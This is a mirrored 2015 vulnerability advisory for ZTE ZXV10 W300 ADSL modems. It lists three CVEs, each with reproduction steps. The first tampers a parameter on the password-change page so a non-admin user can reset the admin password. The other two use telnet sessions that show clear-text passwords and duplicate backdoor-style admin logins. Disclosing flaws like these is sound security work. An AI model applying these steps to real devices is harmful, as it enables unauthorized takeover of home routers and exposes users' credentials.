Skip to content
cyberexploits
webapphardwaretext

ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities

ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities

Published on 2015-11-20

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/webapps/38772.txt7eac4c3a
raw
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]

# Discovered by: Karn Ganeshen

# Vendor Homepage: [www.zte.com.cn]

# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]



*CVE-ID*:

CVE-2015-7257

CVE-2015-7258

CVE-2015-7259



*Note*: Large deployment size, primarily in Peru, used by TdP.



1 *Insufficient authorization controls*

*CVE-ID*: CVE-2015-7257

Observed in Password Change functionality. Other functions may be

vulnerable as well.



*Expected behavior:*

Only administrative 'admin' user should be able to change password for all

the device users. 'support' is a diagnostic user with restricted

privileges. It can change only its own password.



*Vulnerability:*

Any non-admin user can change 'admin' password.



*Steps to reproduce:*

a. Login as user 'support' password XXX

b. Access Password Change page - http://<IP>/password.htm

c. Submit request

d. Intercept and Tamper the parameter ­ username ­ change from 'support' to

'admin'

e. Enter the new password ­> old password is not requested ­> Submit

> Login as admin

-> Pwn!





2 *Sensitive information disclosure - clear-text passwords*

*CVE-ID*: CVE-2015-7258

Displaying user information over Telnet connection, shows all valid users

and their passwords in clear­-text.



*Steps to reproduce:*

$ telnet <IP>

Trying <IP>...

Connected to <IP>.

Escape character is '^]'.

User Access Verification

Username: admin

Password: <­­­ admin/XXX1



$sh

ADSL#login show                 <--­­­ shows user information

Username Password Priority

admin        password1 2

support      password2 0

admin         password3 1



3 *(Potential) Backdoor account feature - **insecure account management*

*CVE-ID*: CVE-2015-7259

Same login account can exist on the device, multiple times, each with

different priority#. It is possible to log in to device with either of the

username/password combination.



It is considered as a (redundant) login support *feature*.



*Steps to reproduce:*

$ telnet <IP>

Trying <IP>...

Connected to <IP>.

Escape character is '^]'.

User Access Verification

User Access Verification

Username: admin

Password: <­--­­ admin/password3



$sh

ADSL#login show

Username  Password  Priority

admin  password1  2

support  password2  0

admin  password3  1



+++++

-- 

Best Regards,

Karn Ganeshen

View on GitHub